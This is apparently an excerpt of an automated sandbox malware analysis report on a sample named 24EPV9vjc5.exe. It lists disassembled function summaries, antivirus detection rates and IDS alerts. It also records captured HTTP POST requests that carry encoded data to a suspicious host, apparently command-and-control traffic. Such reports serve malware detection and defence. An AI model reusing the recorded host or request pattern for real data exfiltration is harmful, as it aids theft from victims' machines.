Instruction Fuzzy Hash: 9D217A71D0061DFF8F11AF94DC429AEBBBAEF09350F10816AF816A2210DB719F509B90

Function 00651175 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON

Download Yara Rule

APIs

HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0065111A,cabinet.dll,00000009,?,?,00000000), ref: 00651186
GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0065111A,cabinet.dll,00000009,?,?,00000000), ref: 00651191
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0065119F
GetLastError.KERNEL32(?,?,?,?,?,0065111A,cabinet.dll,00000009,?,?,00000000), ref: 006511BA
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 006511C2
GetLastError.KERNEL32(?,?,?,?,?,0065111A,cabinet.dll,00000009,?,?,00000000), ref: 006511D7

Strings

SetDllDirectoryW, xrefs: 006511BC
kernel32, xrefs: 0065118C
SetDefaultDllDirectories, xrefs: 00651199

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorLastProc$HandleHeapInformationModule
String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
API String ID: 3104334766-1824683568
Opcode ID: c5bc9d851eb593eefe161463dbe79a6ccedab5f41bb1830fd41cb709a251b709
Instruction ID: ada2c238f5e6355f0a0c8f4a330963e84cde37b171864314db0694c12b4b3a28
Opcode Fuzzy Hash: c5bc9d851eb593eefe161463dbe79a6ccedab5f41bb1830fd41cb709a251b709
Instruction Fuzzy Hash: D001B531200616BB9B206FA6AD45EAF7B5EFB41752F016056FD1596600D770DA05CBF0

Function 00669098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,00669F04,00000003,000007D0,00000003,?,000007D0), ref: 006690B2
GetLastError.KERNEL32(?,00669F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 006690BF
CloseHandle.KERNEL32(00000000,?,00669F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 00669187

Strings

Failed to verify signature of payload: %ls, xrefs: 0066912F
cache.cpp, xrefs: 006690F6
Failed to verify catalog signature of payload: %ls, xrefs: 0066914E
Failed to verify hash of payload: %ls, xrefs: 00669172
Failed to open payload at path: %ls, xrefs: 00669103

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
API String ID: 2528220319-2757871984
Opcode ID: c4d8062b1bbeb7664d28c269288fe909e8b391f7597bf100c4b8cd7859c87f20
Instruction ID: 38a00c3f6835b665dc7c47746ef1de76724d5920fd0dc47a6be67496dbb54fbf
Opcode Fuzzy Hash: c4d8062b1bbeb7664d28c269288fe909e8b391f7597bf100c4b8cd7859c87f20
Instruction Fuzzy Hash: 94212732540637B7CB322A64CD4DFAEBA1FEF06760F214316FC046629093319C61EAE5

Function 006941E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,0069432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0066A063,00000001), ref: 00694203
GetLastError.KERNEL32(00000002,?,0069432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0066A063,00000001,000007D0,00000001,00000001,00000003), ref: 00694212
MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,0069432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0066A063,00000001), ref: 006942A6
GetLastError.KERNEL32(?,0069432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0066A063,00000001,000007D0,00000001), ref: 006942B0

Part of subcall function 00694440: FindFirstFileW.KERNEL32(0067923A,?,00000100,00000000,00000000), ref: 0069447B
Part of subcall function 00694440: FindClose.KERNEL32(00000000), ref: 00694487

Strings

fileutil.cpp, xrefs: 006942CF
\, xrefs: 00694265

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorFindLastMove$CloseFirst
String ID: \$fileutil.cpp
API String ID: 3479031965-1689471480
Opcode ID: 0fab01015dd96eb45eb967f97f6c1a81232e17bd0520438e32440e6fce581f5e
Instruction ID: 540a37e82ac70743f4e04f6ae6e5d17bc6ea385705cef14997d9e14c933dc884
Opcode Fuzzy Hash: 0fab01015dd96eb45eb967f97f6c1a81232e17bd0520438e32440e6fce581f5e
Instruction Fuzzy Hash: 1B31BF36A022269BDF215F958850EBF766FBF51BA0B11416AFC049BB10DB708E43A7D0

Function 0065F005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,00660654,00000001,00000001,00000001,00660654,00000000), ref: 0065F07D
RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,00660654,00000001,00000001,00000001,00660654,00000000,00000001,00000000,?,00660654,00000001), ref: 0065F09A

Strings

Failed to remove update registration key: %ls, xrefs: 0065F0C7
Failed to format key for update registration., xrefs: 0065F033
PackageVersion, xrefs: 0065F05E

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCompareString
String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
API String ID: 446873843-3222553582
Opcode ID: 8cca2320fd2b63b19a4f846f8f38e0b0b4361298bcee588538da0b01fd9e396a
Instruction ID: fc05b3ebc529b1b64c7d7144678bb2831ba62c660d312a973204fb9c64a4f006
Opcode Fuzzy Hash: 8cca2320fd2b63b19a4f846f8f38e0b0b4361298bcee588538da0b01fd9e396a
Instruction Fuzzy Hash: 5321B131940129BBDF21ABA9CD09FAEBEBADF05721F140265FD11E2291E7318E44C694

Function 00694019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,00654DBC,00000000,?,?,00000000,?,0069412D,00000000,00654DBC,00000000,00000000,?,006685EE,?,?), ref: 00694033
GetLastError.KERNEL32(?,0069412D,00000000,00654DBC,00000000,00000000,?,006685EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 00694041
CopyFileW.KERNEL32(00000000,00654DBC,00000000,00654DBC,00000000,?,0069412D,00000000,00654DBC,00000000,00000000,?,006685EE,?,?,00000001), ref: 006940AC
GetLastError.KERNEL32(?,0069412D,00000000,00654DBC,00000000,00000000,?,006685EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 006940B6

Strings

fileutil.cpp, xrefs: 006940D5

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: fileutil.cpp
API String ID: 374144340-2967768451
Opcode ID: 98784d50e0206b24b3f001b84914b4a6870323d6f00e5557c903fe8d0b9e44d1
Instruction ID: a486ea261f400920172085d48b49aa4b36f53b71d11d23b02ed590ae70ad0fdc
Opcode Fuzzy Hash: 98784d50e0206b24b3f001b84914b4a6870323d6f00e5557c903fe8d0b9e44d1
Instruction Fuzzy Hash: 0E21C53660233697DF300B965C80FBB669EEF15BA0B150176FF04DBA51EF518C42A2E5

Function 00694153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00694440: FindFirstFileW.KERNEL32(0067923A,?,00000100,00000000,00000000), ref: 0069447B
Part of subcall function 00694440: FindClose.KERNEL32(00000000), ref: 00694487

SetFileAttributesW.KERNEL32(0067923A,00000080,00000000,0067923A,000000FF,00000000,?,?,0067923A), ref: 00694182
GetLastError.KERNEL32(?,?,0067923A), ref: 0069418C
DeleteFileW.KERNEL32(0067923A,00000000,0067923A,000000FF,00000000,?,?,0067923A), ref: 006941AC
GetLastError.KERNEL32(?,?,0067923A), ref: 006941B6

Strings

fileutil.cpp, xrefs: 006941D1

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
String ID: fileutil.cpp
API String ID: 3967264933-2967768451
Opcode ID: fd357d7dbf7e46f342ae8d268131f3598813e17e7d9a7db8cc382b0f93d6270e
Instruction ID: 5d1d595599caead74ccaed73c3324b5b8550364707b1cfeca45c5d0dc546491c
Opcode Fuzzy Hash: fd357d7dbf7e46f342ae8d268131f3598813e17e7d9a7db8cc382b0f93d6270e
Instruction Fuzzy Hash: 0B014932A41635A7DF310AA6DD04FBF7E9EAF107A1F010216FC04EBA80EB218D8281D0

Function 0067D152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,?,00000000,?,0067D148,00000000), ref: 0067D16D
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0067D148,00000000), ref: 0067D179
CloseHandle.KERNEL32(0069B518,00000000,?,00000000,?,0067D148,00000000), ref: 0067D186
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0067D148,00000000), ref: 0067D193
UnmapViewOfFile.KERNEL32(0069B4E8,00000000,?,0067D148,00000000), ref: 0067D1A2

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 9c47bebf24956878a9d12eff65eced188662444fd89934bc8a6648a413c2785d
Instruction ID: 9e0eaceb68ce21b07f1c410c8f35aa4194f68a19dbd994fa5c50270a3f46059d
Opcode Fuzzy Hash: 9c47bebf24956878a9d12eff65eced188662444fd89934bc8a6648a413c2785d
Instruction Fuzzy Hash: B401E472400B15EFCB31AF66D98085AFBFAAF50721355D93EE1AA52A20C371A890CF50

Function 00696067 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00695FD0,00000000,00000000,00000001), ref: 006960DF
GetLastError.KERNEL32(?,?,00695FD0,00000000,00000000,00000001), ref: 00696130

Strings

8jk, xrefs: 006960C3
dlutil.cpp, xrefs: 00696103, 00696154

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast
String ID: 8jk$dlutil.cpp
API String ID: 1452528299-2326689656
Opcode ID: d3b8ff2b799cb9ef0a5a0b65b76d011e61417670b4024b36547c6bd6c1f7b887
Instruction ID: b79a60ab78ddba45000a5c8abdc1a118c4e26b63fd77fa53d46d3debb9dca992
Opcode Fuzzy Hash: d3b8ff2b799cb9ef0a5a0b65b76d011e61417670b4024b36547c6bd6c1f7b887
Instruction Fuzzy Hash: 0D312876901725B7CF225E99CD44F9B7ABFAF40BA0F120214FD00AB751DB34CD00A6A0

Function 0068615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00681AEC,00000000,7707B38F,?,00681DF0,00000000,7707B38F,00000000,00000000), ref: 00686162
SetLastError.KERNEL32(00000000,7707B38F,00000000,00000000), ref: 006861CA
SetLastError.KERNEL32(00000000,7707B38F,00000000,00000000), ref: 006861D6
_abort.LIBCMT ref: 006861DC

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 1a26539a8c18114a757c43e72db64d98e6688d80bcb1bd7df0711085ad56c325
Instruction ID: 3eb6d3d82516d0ac3378c2d63931e5d5f51c729791cdc985408ab96a8f3fe5f0
Opcode Fuzzy Hash: 1a26539a8c18114a757c43e72db64d98e6688d80bcb1bd7df0711085ad56c325
Instruction Fuzzy Hash: 34F0A435104A01A7C752372DBC0EB6F165B8FC1B71F25131DF99696693FF6089425329

Function 006910B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0069112B
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00691163

Strings

regutil.cpp, xrefs: 006911A9

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: 239afd936602581ca7af6663349acc95aa932efc4234f9a16512fbe88f4c8557
Instruction ID: 82d821881ab7044ab3f12e98f4d0d97954cb666ca6906bafaff4055b68852254
Opcode Fuzzy Hash: 239afd936602581ca7af6663349acc95aa932efc4234f9a16512fbe88f4c8557
Instruction Fuzzy Hash: A1418D72D0012BBBDF219E94CC419AEBBBFEF06350F20416AEE11AB650D7719E119B90

Function 006931EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00693200
SysFreeString.OLEAUT32(00000000), ref: 00693230

Strings

xmlutil.cpp, xrefs: 00693214

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 6262d974f0354681354c9f5fafc2bbca78d769f860861984eda93ef5e0fdbcac
Instruction ID: 9e90ee3e3b0becb49ffd05da6c0be9e55074ae63293c8f016f3b1bd085cfa0ce
Opcode Fuzzy Hash: 6262d974f0354681354c9f5fafc2bbca78d769f860861984eda93ef5e0fdbcac
Instruction Fuzzy Hash: 9DF0BE31101664A7CB314F84AC08FAB77AEAB80BA0F254029FC046B710C7749F1196E0

Source: C:\Users\user\AppData\Local\Temp\lrgstosohhljqy	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\qlar	ReversingLabs: Detection: 26%
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000DA0BB DecryptFileW,	0_2_000DA0BB
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000FFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	0_2_000FFA62
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000D9E9E DecryptFileW,DecryptFileW,	0_2_000D9E9E
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0066A0BB DecryptFileW,	2_2_0066A0BB
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0068FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	2_2_0068FA62
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_00669E9E DecryptFileW,DecryptFileW,	2_2_00669E9E

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49975 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49976 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49977 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50086 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50088 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50089 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50090 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50092 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50095 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50094 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50091 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50096 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50093 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50098 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50097 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50100 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50099 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50102 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50101 -> 172.67.174.91:443

Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 53Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+oContent-Length: 208Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1736430974307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3D203036AC4A619B0A382559AD536038&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
